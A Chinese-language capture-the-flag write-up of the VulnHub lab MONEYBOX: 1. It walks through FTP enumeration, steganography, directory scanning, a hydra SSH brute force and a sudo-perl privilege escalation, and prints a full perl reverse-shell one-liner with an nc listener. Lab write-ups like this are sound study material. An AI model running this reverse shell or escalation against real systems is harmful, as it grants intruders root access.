[限时投稿]MONEYBOX: 1靶场打靶

前言

• 这是vulnhub上的一个简单靶场，网上冲浪的时候发现就下载下来做了一下，发点靶场的渗透过程，就当是学习笔记了。
  靶场地址http://www.vulnhub.com/entry/moneybox-1,653/#download
• 如果VMware里配置靶场环境有问题的话就下个Virtualbox，把靶机的ova文件导入到Virtualbox里。
  Virtualbox的下载路径https://www.virtualbox.org/

配置靶场环境时遇到的坑

在导入ova文件到Virtualbox的时候会遇到的一个问题，导入的界面太大了，下面的选项看不到，这时候调一下分辨率或者直接回车就可以了。

我导入的时候还会遇到这个报错，点击更改网络设置在选好自己的网卡重新来一遍就好了。

遇到这个报错就打开靶场环境的设置在USB设备处，把启用USB控制器选项关了就行。

开始打靶

内网ip有点多，就指定22，21端口来分辨一下哪个是靶机，看到192.168.0.107的22，21端口都开了，多半是靶机了。

扫描全端口和详细的端口信息
看到ftp和ssh服务就想到暴力破解了，打开超级弱口令检测工具，简单爆破一下看看有没有发现。（工具会在附件分享）

爆破到了ftp的账号密码，这是ftp的允许匿名登陆，密码为空也是可以的。
ftp 192.168.0.107 输入账号anonymous，密码为空或者anonymous1234也可以，连接上ftp后ls一下，看看有什么内容。

把图片下载下来，图片名字trytofind，我们看看这张图片有没有用到CTF中常见的隐写术。

虽然查到了图片中的文件，但是查看文件需要密码，ftp这条线索到此就断了。
我们既然ssh没爆破出来就去看看80端口好了，打开浏览器访问。
80端口的网站主页也没什么有用的信息，查看网页源代码也没发现

那就目录扫描看看吧，用dirsearch目录扫描，个人感觉比御剑好多很多。

除了网站首页还扫到一个bolgs目录，访问看看，看似没什么有用的信息，查看网页源代码，拉到最下面。

这段洋屁的意思呢是说还有个叫S3cr3t-T3xt的隐藏目录，访问看看

找到密钥3xtr4ctd4t4，重新回到查看图片隐写处，输入密钥

cat查看图片中隐藏的data.txt，这是一封信件的格式，是告诉renu说他的密码太过于简单了，我们结合ssh端口。把用户名定位renu，用hydra爆破，这里爆破用的密码字典是kali自带的，如果没解压过的可以解压一下。

得到账号密码,renu 987654321
ssh renu@192.168.0.107连接靶机
连接到之后ls一下，user1.txt就是第一个flag

尝试su到root权限失败，查看有什么可以用root权限执行的命令也没有，好像线索又断了，查看一下history历史命令。

历史命令里有cd到home目录下的lily账号，又有把密钥发送给192.168.43.80的lily账号，我怀疑这里是靶场设置的错误了，没道理突然来个别的段的ip地址还跟本地有一个同样叫lily的账号。如果是设置错误，那就是把生成的密钥发送给了本地的lily账户，如果是这样的话就能不用账号密码，用密钥就能够登录lily账户，为了验证这个猜想,执行ssh lily@127.0.0.1

成功连接后ls一下，拿下第二个flag。再试试能不能在lily账户上su到root，再次失败了，sudo -l查看一下能sudo使用的命令。

lily用户能用sudo执行/usr/bin/perl
而perl可以反弹shell到kali攻击机上了，因为是sudo管理员权限启动的反弹shell，所以shell也是root权限的，网上找一条perl反弹shell的命令。

在lily用户的命令行输入
sudo perl -e ‘use Socket;$i=”你的攻击机ip地址”;$p=你监听的端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};’

在攻击机监听
nc -nvlp 你的监听端口

收到shell，我以为就在root目录下ls一下就能看到最后一个flag了，然而最后一个flag是隐藏的文件，在root根目录下执行ls -a才能看见。

总结

渗透还是要多实操，有时候脑子没记住的，手记住了。
最后，求点赞，求金币